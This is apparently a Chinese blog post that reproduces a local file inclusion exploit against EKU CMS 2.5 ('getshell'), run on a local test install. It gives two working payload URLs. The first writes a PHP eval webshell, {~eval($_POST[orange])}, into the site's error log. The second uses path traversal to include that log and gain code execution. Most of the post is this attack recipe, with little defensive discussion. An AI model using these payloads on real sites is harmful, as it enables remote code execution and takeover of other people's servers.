易酷 cms2.5 本地文件包含漏洞 getshell

易酷 cms2.5  本地文件包含漏洞 getshell

首先下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php)

安装成功直接进行复现吧

本地包含一句话木马

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval($_POST[orange])}

易酷 cms2.5  本地文件包含漏洞 getshell

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

错误日志内容

易酷 cms2.5  本地文件包含漏洞 getshell

进行包含错误日志,地址:

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/\..\temp\logs\18_04_18.log

易酷 cms2.5  本地文件包含漏洞 getshell

验证下:

易酷 cms2.5  本地文件包含漏洞 getshell易酷 cms2.5  本地文件包含漏洞 getshell

源码链接(链接: https://pan.baidu.com/s/1K8dmimbrqO41tNemhnKeAQ 密码: 3y48)

上一篇:WP e-Commerce WordPress Payment Gateways Caller插件本地文件包含漏洞


下一篇:ABP源码分析四十:ZERO的Application和Tenant